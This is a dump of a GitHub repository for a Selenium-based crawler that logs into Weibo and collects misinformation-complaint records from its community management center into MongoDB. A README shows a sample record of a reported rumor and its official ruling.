[ { "alpha_fraction": 0.5993091464042664, "alphanum_fraction": 0.5993091464042664, "avg_line_length": 24.217391967773438, "blob_id": "da100c11968a14f8f7733e166fe0b1825d1b4091", "content_id": "089c707c086bf3b4cf888d444899feaa6ce6955f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/cookie.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\n\nfrom driver import getChrome\n\n\nclass Cookie(object):\n url = 'http://weibo.com/login.php'\n def __init__(self):\n self.browser = getChrome()\n\n def getWeiboCookie(self):\n cookie_dic = {}\n cookies = self.browser.get_cookies()\n self.browser.close()\n for cookie in cookies:\n if 'name' in cookie and 'value' in cookie:\n cookie_dic[cookie['name']]=cookie['value']\n return cookie_dic\n\nif __name__ == '__main__':\n cookie = Cookie()\n print(cookie.getWeiboCookie())" }, { "alpha_fraction": 0.3759876787662506, "alphanum_fraction": 0.4765850901603699, "avg_line_length": 29.523529052734375, "blob_id": "730b4c70508a7ef037654334f5b06acc28f57470", "content_id": "8a6b3bf8bfc3eec3c42eda47f9a2a5994b4f7431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6193, "license_type": "no_license", "max_line_length": 295, "num_lines": 170, "path": "/README.md", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "# weibo-complaint-crawler\n\nPython 3.6+\n\n### Data Source\n\n[微博社区管理中心(Weibo Community Managment Center)](http://service.account.weibo.com/) (now https: https://service.account.weibo.com/)\n\n### Dataset (36,075, up to 2018-08-30)\n\n- [Baidu](https://pan.baidu.com/s/1raeGg5giL4ov8kJqxqpg5g)\n- code: 1024\n\nSample:\n\n```mongodb\n{ \n \"_id\" : ObjectId(\"5b9b5f0219172c1ee4ec682d\"), \n \"url\" : \"http://service.account.weibo.com/show?rid=K1CaP8wxf7K4j\", \n \"title\" : \"@yvonne爱吃可丽饼 举报@每日上海 不实信息\", \n \"reports\" : [\n {\n \"reporter_url\" : \"http://weibo.com/u/6154858995\", \n \"reporter_name\" : \"漳州普法\", \n \"reporter_img_url\" : \"https://tvax1.sinaimg.cn/crop.6.8.86.86.50/006Ix9Zhly8fd75vcxu9oj302s02sglq.jpg\", \n \"reporter_gender\" : \"male\", \n \"reporter_location\" : \"福建 漳州\", \n \"reporter_description\" : \"漳州普法官方微博\", \n \"report_time\" : \"2018-08-30 12:47\", \n \"report_text\" : \"漳州普法:#微博辟谣# 不实消息,公安机关已经辟谣! .\"\n }, \n {\n \"reporter_url\" : \"http://weibo.com/u/2126421215\", \n \"reporter_name\" : \"疯丫头小Ann\", \n \"reporter_img_url\" : \"https://tva3.sinaimg.cn/crop.0.0.640.640.50/7ebe9cdfjw8eg2ht89dz0j20hs0hs74s.jpg\", \n \"reporter_gender\" : \"female\", \n \"reporter_location\" : \"海外 新加坡\", \n \"reporter_description\" : \"酷爱彩妆,护肤!坡县幸福小吃货一枚!\", \n \"report_time\" : \"2018-08-30 12:03\", \n \"report_text\" : \"疯丫头小Ann:#微博辟谣# 有人辟谣了 实际发生地点与人物都和宣传文案不一致 .\"\n }, \n {\n \"reporter_url\" : \"http://weibo.com/u/1433584002\", \n \"reporter_name\" : \"yvonne爱吃可丽饼\", \n \"reporter_img_url\" : \"https://tvax1.sinaimg.cn/crop.0.0.1125.1125.50/5572c182ly8futbpkmiq3j20v90v9acv.jpg\", \n \"reporter_gender\" : \"female\", \n \"reporter_location\" : \"海外 美国\", \n \"reporter_description\" : \"Love is just a word until someone special gives it a meaning.\", \n \"report_time\" : \"2018-08-30 10:57\", \n \"report_text\" : \"yvonne爱吃可丽饼:#微博辟谣# 假信息 .\"\n }\n ], \n \"actual_reporter_count\" : NumberInt(3), \n \"rumor\" : {\n \"rumorer_name\" : \"每日上海\", \n \"rumorer_url\" : \"http://weibo.com/u/2128372947\", \n \"rumorer_gender\" : \"female\", \n \"rumorer_location\" : \"上海\", \n \"rumorer_description\" : \"关注每日上海,乐享潮流资讯。合作联系+Q: 2605326688\", \n \"rumor_time\" : \"2018-08-30 09:58:32\", \n \"rumor_url\" : \"http://weibo.com/2128372947/Gx0aVsVJp\", \n \"rumor_text\" : \"每日上海 :2018年情人节当天,位于安徽省芜湖广电大厦地下停车场内,42岁女主播与54岁副总编在车内讨论工作,结果由于车内空间狭小,男的太激动,导致突发心梗去世…[doge]\"\n }, \n \"official\" : {\n \"official_text\" : \"经查,此微博称“位于安徽省芜湖广电大厦地下停车场内,42岁女主播与54岁副总编在车内讨论工作,导致突发心梗去世”不实。@德州运河公安分局 已辟谣:视频中并非芜湖广电大厦地下停车场,且该单位未发生副总编死亡事件 。详情:https://weibo.com/2403912521/Gw7zhxxIm 。被举报人言论构成“发布不实信息”。现根据《微博举报投诉操作细则》(http://service.account.weibo.com/roles/xize )第19条,对被举报人处理如下:扣除信用积分2分。上述处理在公布后60分钟内生效。\"\n }, \n \"looks\" : [\n [\n \"http://weibo.com/u/5872248592\", \n \"simoncV\"\n ], \n [\n \"http://weibo.com/u/3221034714\", \n \"爱吃肉的牙牙兔\"\n ], \n [\n \"http://weibo.com/u/6683056792\", \n \"mustard178\"\n ], \n [\n \"http://weibo.com/u/2102315083\", \n \"_周涵_\"\n ], \n [\n \"http://weibo.com/u/5836275950\", \n \"决恋星辰98217\"\n ], \n [\n \"http://weibo.com/u/1710759290\", \n \"independencei989\"\n ], \n [\n \"http://weibo.com/u/1347280187\", \n \"克服进化论的朱Sir\"\n ], \n [\n \"http://weibo.com/u/6554443743\", \n \"电影大鸟\"\n ], \n [\n \"http://weibo.com/u/6496363207\", \n \"Henry_Han_IPR\"\n ], \n [\n \"http://weibo.com/u/6075978015\", \n \"一个为生活发声的地方\"\n ], \n [\n \"http://weibo.com/u/2751779283\", \n \"土豪榜叔\"\n ], \n [\n \"http://weibo.com/u/6341984206\", \n \"诸葛亮亮律师\"\n ], \n [\n \"http://weibo.com/u/1578078673\", \n \"一脉印象\"\n ], \n [\n \"http://weibo.com/u/5649081220\", \n \"风乎舞雩_KAZE\"\n ], \n [\n \"http://weibo.com/u/6222824749\", \n \"起个什么名字好呢-02\"\n ], \n [\n \"http://weibo.com/u/5498125999\", \n \"即刻\"\n ], \n [\n \"http://weibo.com/u/2242945720\", \n \"快拉脱离\"\n ], \n [\n \"http://weibo.com/u/5850456137\", \n \"阳光七星投资集团\"\n ], \n [\n \"http://weibo.com/u/2081309513\", \n \"1Freekiwi\"\n ], \n [\n \"http://weibo.com/u/1742335401\", \n \"啊呦喂-嘿\"\n ], \n [\n \"http://weibo.com/u/1961261875\", \n \"有法依\"\n ], \n [\n \"http://weibo.com/u/1447685703\", \n \"朝来夕去\"\n ], \n [\n \"http://weibo.com/u/1815608542\", \n \"严MI\"\n ], \n [\n \"http://weibo.com/u/2074743167\", \n \"BiuBiuBiu-021\"\n ], \n [\n \"http://weibo.com/u/3975175672\", \n \"腹肌工场\"\n ]\n ]\n}\n```\n" }, { "alpha_fraction": 0.6069757342338562, "alphanum_fraction": 0.6112292408943176, "avg_line_length": 39.308570861816406, "blob_id": "faf6c80f9a9aab01a2f7451076574bde546c2bf3", "content_id": "85d13ee47d623a1f347e1995f21c20d74c9da3e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7059, "license_type": "no_license", "max_line_length": 122, "num_lines": 175, "path": "/weibo.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "# from gevent import monkey\n# monkey.patch_all()\n# from gevent import spawn, joinall\nimport multiprocessing as mp\n\nimport os, sys\nimport numpy as np\nfrom driver import getDriver\nfrom conf import ACCOUNT, PWD, IMPLICIT_WAIT_DRIVER, SLEEP_NEXT_COMPLAINTS_PAGE, SLEEP_NEXT_COMPLAINT, \\\n RETRY_COMPLAINT_DETAIL_TIMEOUT_COUNT, RESTART_EXCEPTION_COUNT, RESTART_TIMEOUT_EXCEPTION_COUNT,\\\n SAVE_COMPAINT_BATCH, N_WORKER, WEB_DRIVER\nfrom mongo import MongoHelper\nfrom extract import *\nfrom selenium.common.exceptions import TimeoutException\n\ndef login(driver):\n # Login\n driver.get('http://weibo.com/login.php')\n driver.implicitly_wait(IMPLICIT_WAIT_DRIVER)\n driver.find_element_by_xpath('//*[@id=\"loginname\"]').clear()\n driver.find_element_by_xpath('//*[@id=\"loginname\"]').send_keys(ACCOUNT)\n driver.find_element_by_xpath('//*[@id=\"pl_login_form\"]/div/div[3]/div[2]/div/input').clear()\n time.sleep(1)\n driver.find_element_by_xpath('//*[@id=\"pl_login_form\"]/div/div[3]/div[2]/div/input').send_keys(PWD)\n time.sleep(1)\n driver.find_element_by_xpath('//*[@id=\"pl_login_form\"]/div/div[3]/div[6]/a').click()\n time.sleep(1)\n print('>> Successfully Logged In!')\n\ndef getComplaintUrls(driver):\n\n # Enter http://service.account.weibo.com\n driver.get('http://service.account.weibo.com/?type=5&status=4')\n page_count = 1\n print('>> Begin Crawling Complaint Urls...')\n while True:\n # TODO: if page_count > total, break\n # Iterate list in each page\n print(f'>>>> Page: {page_count}')\n complaint_urls = []\n for info in driver.find_elements_by_xpath('//div[@id=\"pl_service_showcomplaint\"]/table[@class=\"m_table\"]'\n '/tbody/tr[not(@class)]'):\n # print(info.text)\n # print(info.find_element_by_xpath('td[2]/div[@class=\"m_table_tit\"]/a').get_attribute('href'),\n # info.find_element_by_xpath('td[3]/a').text,\n # info.find_element_by_xpath('td[4]/a').text,\n # )\n # print(info.find_element_by_xpath('td[2]/div[@class=\"m_table_tit\"]/a').get_attribute('href'))\n complaint_urls.append(info.find_element_by_xpath('td[2]/div[@class=\"m_table_tit\"]/a').get_attribute('href'))\n\n try:\n # Next page\n next = driver.find_element_by_xpath('//a[@class=\"W_btn_c\"][last()]') # if already at last page, will click 上一页\n except:\n print('Next page not found')\n break\n\n print('>>>> Writing to Files...')\n with open('complaint_urls.txt', 'a') as f:\n f.write('\\n'.join(complaint_urls) + '\\n')\n\n time.sleep(SLEEP_NEXT_COMPLAINTS_PAGE)\n next.click()\n page_count += 1\n\ndef getComplaintDetail(url, driver, driver_no, retry=0):\n try:\n driver.get(url)\n except TimeoutException as e: # selenium exception type\n if retry >= RETRY_COMPLAINT_DETAIL_TIMEOUT_COUNT:\n print(f'[{driver_no}] >>>> TimeoutException still occurs in {retry} Retries, Raise...')\n raise(e)\n else:\n retry += 1\n print(f'[{driver_no}] >>>> Timeout, retrying {retry}...')\n # driver = getChrome(headless=True)\n # login(driver)\n return getComplaintDetail(url, driver, driver_no, retry)\n\n try:\n title = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[1]/div[2]/h2').text\n except:\n title = '' # not necessary\n\n print(f'[{driver_no}] >>>> Begin extractReporters')\n reporters, actual_reporter_count = extractReporters(driver)\n print(f'[{driver_no}] >>>> Begin extractReports')\n reports = extractReports(driver, reporters)\n print(f'[{driver_no}] >>>> Begin extractRumor')\n rumor = extractRumor(driver)\n print(f'[{driver_no}] >>>> Begin extractOfficial')\n official = extractOfficial(driver)\n print(f'[{driver_no}] >>>> Begin extractLooks')\n looks = extractLooks(driver)\n\n return {\n 'title': title,\n 'reports': reports,\n 'actual_reporter_count': actual_reporter_count,\n 'rumor': rumor,\n 'official': official,\n 'looks': looks\n }\n\ndef restart_program():\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\ndef getComplaintDetails(urls, driver_no):\n driver = getDriver(driver=WEB_DRIVER, driver_no=driver_no)\n login(driver)\n print(f'[{driver_no}] >> Begin Crawling Complaint Details for {len(urls)} pages...')\n\n mongo = MongoHelper()\n complaints = []\n exception_count = 0\n timeout_exception_count = 0\n page_count = 0\n for url in urls:\n # restart when come across too many timeouts\n if timeout_exception_count >= RESTART_TIMEOUT_EXCEPTION_COUNT:\n print(f'[{driver_no}] >> Timeout Excepiton reach {RESTART_EXCEPTION_COUNT}, trying to restart program!')\n restart_program()\n elif exception_count >= RESTART_EXCEPTION_COUNT:\n print(f'[{driver_no}] >> Exception reach {RESTART_EXCEPTION_COUNT}, trying to restart program!')\n restart_program()\n\n page_count += 1\n print(f'\\n[{driver_no}] >>>> Complaint {page_count}, URL: {url}')\n try:\n time.sleep(SLEEP_NEXT_COMPLAINT)\n complaint = getComplaintDetail(url, driver, driver_no)\n print(complaint)\n complaints.append({'url': url, **complaint})\n except Exception as e:\n print(f'[{driver_no}] >>>> Got Exception: {traceback.format_exc()}, URL: {url}')\n exception_count += 1\n if type(e) == TimeoutException:\n timeout_exception_count += 1\n\n complaint_count = len(complaints)\n if complaint_count == SAVE_COMPAINT_BATCH:\n print(f'\\n[{driver_no}] >> Writing {complaint_count} complaints to mongo...')\n mongo.update(complaints)\n complaints = []\n\n # update remaining results\n if len(complaints) != 0:\n mongo.update(complaints)\n print(f'\\n[{driver_no}] >> Writing {len(complaints)} complaints to mongo...')\n else:\n pass\n print(f'[{driver_no}] >> All Complaints Crawling Completed!')\n\ndef getComplaintDetailsMultiWorker(n_worker):\n with open('complaint_urls.txt') as f:\n urls = f.read().split('\\n')\n mongo = MongoHelper()\n crawled_urls = mongo.getCrawledUrls()\n todo_urls = [url for url in urls if url not in crawled_urls]\n print(f'>> {len(crawled_urls)}/{len(urls)} urls has been crawled, remain: {len(todo_urls)}')\n todo_urls_list = np.array_split(todo_urls, n_worker)\n\n # Concurrent\n # joinall([spawn(getComplaintDetails, urls, i) for i, urls in enumerate(urls_list)])\n pool = mp.Pool(n_worker)\n # Create post object\n jobs = [pool.apply_async(getComplaintDetails, (urls, i)) for i, urls in enumerate(todo_urls_list)]\n return [job.get() for job in jobs]\n\n\nif __name__ == '__main__':\n # getComplaintUrls(driver)\n import cProfile\n cProfile.run(f'getComplaintDetailsMultiWorker({N_WORKER})')" }, { "alpha_fraction": 0.779411792755127, "alphanum_fraction": 0.7941176295280457, "avg_line_length": 7.714285850524902, "blob_id": "e0648303ba09b85e06d52919cb51279ce0f2bdce", "content_id": "8d2840cedf9b68a5c84754b0f9fd0bbdd3821e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 68, "license_type": "no_license", "max_line_length": 14, "num_lines": 7, "path": "/requirements.txt", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "requests\r\nbeautifulsoup4\r\nscrapy\r\nselenium\r\npymongo\r\nnumpy\r\ngevent\r\n" }, { "alpha_fraction": 0.6776556968688965, "alphanum_fraction": 0.6886447072029114, "avg_line_length": 33.14583206176758, "blob_id": "9749472458950162543a7071e7ff761c6c486e7e", "content_id": "e857c4b8449cfb91b0cc8c9a872b8166dde71abc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1638, "license_type": "no_license", "max_line_length": 101, "num_lines": 48, "path": "/driver.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "import platform\nfrom selenium import webdriver\nimport random\n\n\ndef getChrome(headless=True):\n options = webdriver.ChromeOptions()\n if headless == True:\n options.add_argument('--headless')\n options.add_argument('--disable-notifications')\n options.add_argument(\"--window-size=1920x1080\")\n options.add_argument('--no-sandbox')\n\n # download and put chromedriver_to the path first\n if platform.system() == 'Windows':\n driver = webdriver.Chrome(executable_path='./chromedriver_win32.exe', chrome_options=options)\n elif platform.system() == 'Linux':\n driver = webdriver.Chrome(executable_path='./chromedriver_linux', chrome_options=options)\n else:\n driver = webdriver.Chrome(executable_path='./chromedriver_mac', chrome_options=options)\n\n driver.maximize_window()\n return driver\n\ndef getFirefox(headless=True):\n options = webdriver.FirefoxOptions()\n if headless == True:\n options.add_argument('--headless')\n\n options.add_argument('--disable-notifications')\n options.add_argument(\"--window-size=1920x1080\")\n options.add_argument('--no-sandbox')\n\n # download and put geckodriver to the path first\n driver = webdriver.Firefox(executable_path='./geckodriver', options=options)\n\n driver.maximize_window()\n return driver\n\ndef getDriver(driver, driver_no):\n if driver == 'Chrome':\n driver = getChrome(headless=True)\n elif driver == 'Firefox':\n driver = getFirefox(headless=True)\n else:\n driver = random.choice([getChrome, getFirefox])(headless=True)\n print(f'{[driver_no]} Random chose {type(driver)}')\n return driver" }, { "alpha_fraction": 0.6645435094833374, "alphanum_fraction": 0.7133758068084717, "avg_line_length": 17.84000015258789, "blob_id": "4d3d49dcc9221c06092b33e2f98114ea57a0e9d9", "content_id": "dca16827b02ff6293a4c944fcf61041b61030ab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 40, "num_lines": 25, "path": "/conf.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "ACCOUNT = ''\nPWD = ''\n\nMONGO_HOST = ''\nMONGO_PORT = 30000\nMONGO_DATABASE = ''\nMONGO_USERNAME = ''\nMONGO_PASSWORD= ''\nMONGO_COLLECTION = ''\n\nWEB_DRIVER = 'Chrome'\nN_WORKER = 4\n\nIMPLICIT_WAIT_DRIVER = 15\n\nSAVE_COMPAINT_BATCH = 10\nRESTART_EXCEPTION_COUNT = 30\nRESTART_TIMEOUT_EXCEPTION_COUNT = 3\nRETRY_COMPLAINT_DETAIL_TIMEOUT_COUNT = 1\nSLEEP_NEXT_COMPLAINTS_PAGE = 1\nSLEEP_NEXT_COMPLAINT = 1\n\nREPORTER_MAX_ITER = 100\nSLEEP_NEXT_REPORTER = 0.5\nSLEEP_NEXT_REPORTS_PAGE = 0.5\n" }, { "alpha_fraction": 0.6009767651557922, "alphanum_fraction": 0.608632504940033, "avg_line_length": 46.35625076293945, "blob_id": "736e2b69e00690ec37acd1cc710287481196e333", "content_id": "6c5ffe746fc4cd5407914618b6f83ab0bf016535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7648, "license_type": "no_license", "max_line_length": 134, "num_lines": 160, "path": "/extract.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "import traceback\nimport time\nimport re\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom conf import SLEEP_NEXT_REPORTER, SLEEP_NEXT_REPORTS_PAGE, REPORTER_MAX_ITER\n\ndef extractReporter(driver):\n reporter = driver.find_element_by_xpath(\n '//div[@class=\"W_main_half_l\"]//div[@class=\"user bg_blue2 clearfix\"]')\n reporter_name = reporter.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').text\n reporter_url = reporter.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').get_attribute('href')\n reporter_img_url = reporter.find_element_by_xpath(\n '//*[@id=\"pl_service_common\"]/div[2]/div[1]/div/div[2]/div/img').get_attribute('src')\n reporter_gender = reporter.find_element_by_xpath('p[@class=\"mb\"]/img').get_attribute('class')\n reporter_location = reporter.find_element_by_xpath('p[@class=\"mb\"]').text\n reporter_description = reporter.find_element_by_xpath('p[last()]').text\n\n return {'reporter_url': reporter_url,\n 'reporter_name': reporter_name,\n 'reporter_img_url': reporter_img_url,\n 'reporter_gender': reporter_gender,\n 'reporter_location': reporter_location,\n 'reporter_description': reporter_description,\n }\n\ndef extractReporters(driver):\n # TODO: one reporter has multiple reports: http://service.account.weibo.com/show?rid=K1CaK6wBk7agg\n reporter_count_text = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[2]/div[1]/div/div[1]/span[2]').text\n if re.match('\\(共有', reporter_count_text):\n reporter_count = 20\n actual_reporter_count = int(reporter_count_text.split(sep='共有')[1].split(sep='人')[0])\n else:\n reporter_count = int(reporter_count_text.split(sep='共')[1].split(sep='人')[0])\n actual_reporter_count = reporter_count\n print('Reporter Count: {}, Actual: {}'.format(reporter_count, actual_reporter_count))\n\n if reporter_count == 1:\n crawled_reporters = [extractReporter(driver)]\n else:\n iter = 0\n crawled_reporters = []\n crawled_reporter_names = []\n while True:\n if iter > REPORTER_MAX_ITER:\n print(f'reporter iter exceeds {REPORTER_MAX_ITER}, break')\n break\n\n iter += 1\n print('reporter iter: {}'.format(iter))\n if len(crawled_reporter_names) == reporter_count:\n break\n\n try: # StaleElementReferenceException, if no try, will throw not-attached element exception\n reporter = driver.find_element_by_xpath(\n '//div[@class=\"W_main_half_l\"]//div[@class=\"user bg_blue2 clearfix\"]')\n reporter_name = reporter.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').text\n\n if reporter_name not in crawled_reporter_names:\n crawled_reporters.append(extractReporter(driver))\n crawled_reporter_names.append(reporter_name)\n else:\n print('duplicated reporter')\n\n next_reporter = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[2]/div[1]/div/div[1]/a')\n next_reporter.click()\n time.sleep(SLEEP_NEXT_REPORTER)\n except:\n print('Reporter iter exception: {}'.format(traceback.format_exc()))\n continue\n\n return crawled_reporters, actual_reporter_count\n\ndef extractReports(driver, crawled_reporters):\n crawled_reports_count = 0\n while True:\n reports = driver.find_elements_by_xpath('//*[@id=\"pl_service_common\"]/div[4]/div[1]/div/div/div[1]/div')\n for report in reports:\n report_time_text = report.find_element_by_xpath('p[@class=\"publisher\"]').text\n if report_time_text != '举报人:':\n report_time = report_time_text.split('举报人陈述时间:')[1]\n report_text = report.find_element_by_xpath('div[@class=\"feed clearfix\"]/div[@class=\"con\"]').text\n reporter_url = report.find_element_by_xpath(\n 'div[@class=\"feed clearfix\"]/div[@class=\"con\"]/a').get_attribute('href')\n for r in crawled_reporters:\n if r['reporter_url'] == reporter_url:\n r['report_time'] = report_time\n r['report_text'] = report_text\n else:\n pass\n else:\n print('Reporter deleted report')\n pass\n crawled_reports_count += len(reports)\n print('crawled reporters: {}, crawled reports: {}'.format(len(crawled_reporters), crawled_reports_count))\n\n try:\n next_page = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[4]/div[1]/div/div/div[2]/div/a[@class=\"next\"]')\n next_page.click()\n time.sleep(SLEEP_NEXT_REPORTS_PAGE)\n print('Go to next reports page')\n except:\n break\n\n return crawled_reporters\n\ndef extractRumor(driver):\n rumorer = driver.find_element_by_xpath('//div[@class=\"W_main_half_r\"]//div[@class=\"user bg_orange2 clearfix\"]')\n rumorer_name = rumorer.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').text\n rumorer_url = rumorer.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').get_attribute('href')\n rumorer_gender = rumorer.find_element_by_xpath('p[@class=\"mb\"]/img').get_attribute('class')\n rumorer_location = rumorer.find_element_by_xpath('p[@class=\"mb\"]').text\n rumorer_description = rumorer.find_element_by_xpath('p[last()]').text\n crawled_rumor = {\n 'rumorer_name': rumorer_name,\n 'rumorer_url': rumorer_url,\n 'rumorer_gender': rumorer_gender,\n 'rumorer_location': rumorer_location,\n 'rumorer_description': rumorer_description,\n }\n\n rumor = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[4]/div[2]/div/div/div/div')\n # TODO: handle deleted rumor weibo\n rumor_time_text = rumor.find_element_by_xpath('p[@class=\"publisher\"]').text\n if rumor_time_text != '被举报微博':\n rumor_time = rumor_time_text.split('被举报微博 发布时间:')[1].split(' | 原文')[0]\n\n try:\n rumor_url = rumor.find_element_by_xpath('p[@class=\"publisher\"]/a').get_attribute('href')\n except:\n print('Can not find original url of rumor')\n rumor_url = ''\n\n rumor_text = rumor.find_element_by_xpath('div[@class=\"feed bg_orange2 clearfix\"]/div[@class=\"con\"]').text\n rumorer_url = rumor.find_element_by_xpath(\n 'div[@class=\"feed bg_orange2 clearfix\"]/div[@class=\"con\"]/a').get_attribute('href')\n assert rumorer_url == crawled_rumor['rumorer_url']\n crawled_rumor['rumor_url'] = rumor_url\n crawled_rumor['rumor_time'] = rumor_time\n crawled_rumor['rumor_text'] = rumor_text\n else:\n print('Rumor weibo deleted')\n pass\n\n return crawled_rumor\n\ndef extractOfficial(driver):\n # TODO: multiple times of official: http://service.account.weibo.com/show?rid=K1CaK6wBk7agg\n official_text = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[3]/div/div/p').text\n crawled_official = {\n 'official_text': official_text\n }\n return crawled_official\n\ndef extractLooks(driver):\n crawled_looks = []\n for look in driver.find_elements_by_xpath('//*[@id=\"pl_service_looker\"]/div/ul/li'):\n looker_url = look.find_element_by_xpath('a').get_attribute('href')\n looker_name = look.find_element_by_xpath('a').get_attribute('title')\n crawled_looks.append([looker_url, looker_name])\n return crawled_looks" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 34.85714340209961, "blob_id": "fa1d4cfd7daff8093364b3de61d56ce4bbf27f0e", "content_id": "c2861255c6e7dbdff341759bf13af5e68a72d3be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 752, "license_type": "no_license", "max_line_length": 105, "num_lines": 21, "path": "/mongo.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\n\nfrom conf import MONGO_HOST, MONGO_PORT, MONGO_DATABASE, MONGO_USERNAME, MONGO_PASSWORD, MONGO_COLLECTION\n\nclass MongoHelper:\n\n def __init__(self):\n self.client = MongoClient(MONGO_HOST, MONGO_PORT)\n self.db = self.client[MONGO_DATABASE]\n self.db.authenticate(MONGO_USERNAME, MONGO_PASSWORD)\n self.collection = self.db[MONGO_COLLECTION]\n\n def update(self, data):\n if type(data) is list:\n for i in data:\n self.collection.replace_one({'url': i['url']}, i, upsert=True)\n else:\n self.collection.replace_one({'url': data['url']}, data, upsert=True)\n\n def getCrawledUrls(self):\n return [i['url'] for i in self.collection.find({})]" } ]
8
Yahnit/Ultimate-Tic-Tac-Toe
https://github.com/Yahnit/Ultimate-Tic-Tac-Toe
1d7d13ac39c9663ac6172548794f395821c9e9d1
e56f7d86af01a4374057970bf032ecbcf324d1c5
e733254344dc1147a44df769d4b0a86bdefb6bb5
refs/heads/master
2020-03-13T21:07:06.477398
2018-07-23T14:58:17
2018-07-23T14:58:17
131,288,641
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.45419830083847046, "alphanum_fraction": 0.4844781756401062, "avg_line_length": 35.97508239746094, "blob_id": "27cf8e07b1a26d20dda80173e28ecc38e9821855", "content_id": "461fa88be265dfd8e3e57a1f5c4ec647d6000dc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22259, "license_type": "no_license", "max_line_length": 172, "num_lines": 602, "path": "/bot.py", "repo_name": "Yahnit/Ultimate-Tic-Tac-Toe", "src_encoding": "UTF-8", "text": "import copy\nimport time\n\nclass Team17():\n def __init__(self):\n self.flag = \"\"\n self.count_plyr = 0\n self.count_opp = 0\n self.depth_limit = 3\n self.max = 10000000000000\n self.timer = 15\n self.startTime = \"\"\n self.utility_matrix = []\n\n def move(self, board, old_move, player_flag):\n self.startTime = time.time()\n self.flag = player_flag\n self.utility_matrix = [0,-1,-10,-100,-1000,1,0,0,100,0,10,0,0,0,0,100,0,0,0,0,1000,0,0,0,0]\n\n if old_move == (-1, -1):\n return (8, 8)\n\n opp_flag = 'o' if self.flag == 'x' else 'x'\n\n temp_board = copy.deepcopy(board)\n temp_block = copy.deepcopy(board.block_status)\n available_moves = board.find_valid_move_cells(old_move)\n\n for i in range(4):\n for j in range(4):\n if temp_block[i][j] == player_flag:\n self.count_plyr += 1\n elif temp_block[i][j] == opp_flag:\n self.count_opp += 1\n\n blocks_available = []\n for move in available_moves:\n x, y = move[0]/4, move[1]/4\n if [x,y] not in blocks_available:\n blocks_available.append([x,y])\n #print blocks_available\n\n plyr_win_block = self.check_win_block(temp_board, blocks_available, player_flag)\n if plyr_win_block != (-1 ,-1):\n return (plyr_win_block[0], plyr_win_block[1])\n\n opp_win_block = self.check_win_block(temp_board, blocks_available, opp_flag)\n if opp_win_block != (-1 ,-1):\n return (opp_win_block[0], opp_win_block[1])\n\n tentative_move, max_depth = (0,0,0), 2\n\n while time.time() - self.startTime < self.timer:\n best_move = tentative_move\n tentative_move = self.minimax(temp_board, old_move, True, player_flag, opp_flag, 0, -self.max, self.max, -1,-1, max_depth)\n max_depth += 1\n\n available_moves = board.find_valid_move_cells(old_move)\n if (best_move[1], best_move[2]) in available_moves:\n return (best_move[1], best_move[2])\n else:\n return random.choice(available_moves)\n\n def minimax(self, board, old_move, is_max, player_sign, opponent_sign, depth, alpha, beta, best_row, best_col, max_depth):\n if time.time() - self.startTime > self.timer:\n return (0, best_row, best_col)\n\n available_moves = board.find_valid_move_cells(old_move)\n\n if depth == max_depth or len(available_moves) == 0:\n utility = self.utility_get(board, player_sign, opponent_sign)\n return (utility, best_row, best_col)\n\n if len(available_moves) > 20 and depth == 0:\n self.depth_limit = min(2, self.depth_limit)\n\n if is_max:\n for move in available_moves:\n temp_board = copy.deepcopy(board)\n temp_board.update(old_move, move, player_sign)\n utility = self.minimax(temp_board, move, not is_max, player_sign, opponent_sign, depth+1 , alpha, beta, best_row, best_col, max_depth) # agains call minimax\n tent_val = utility[0]\n if tent_val > alpha:\n alpha , best_row, best_col = utility[0], move[0], move[1]\n\n if alpha > beta:\n break\n\n if time.time() - self.startTime > self.timer:\n return (utility, best_row, best_col)\n\n return (alpha, best_row, best_col)\n\n else:\n for move in available_moves:\n temp_board = copy.deepcopy(board)\n temp_board.update(old_move, move, opponent_sign)\n utility = self.minimax(temp_board, move, is_max, player_sign, opponent_sign, depth+1 , alpha, beta, best_row, best_col, max_depth)\n tent_val = utility[0]\n if tent_val < beta:\n beta, best_row, best_col = utility[0], move[0], move[1]\n\n if alpha > beta:\n break;\n\n if time.time() - self.startTime > self.timer:\n return (utility, best_row, best_col)\n\n return (beta, best_row, best_col)\n\n def 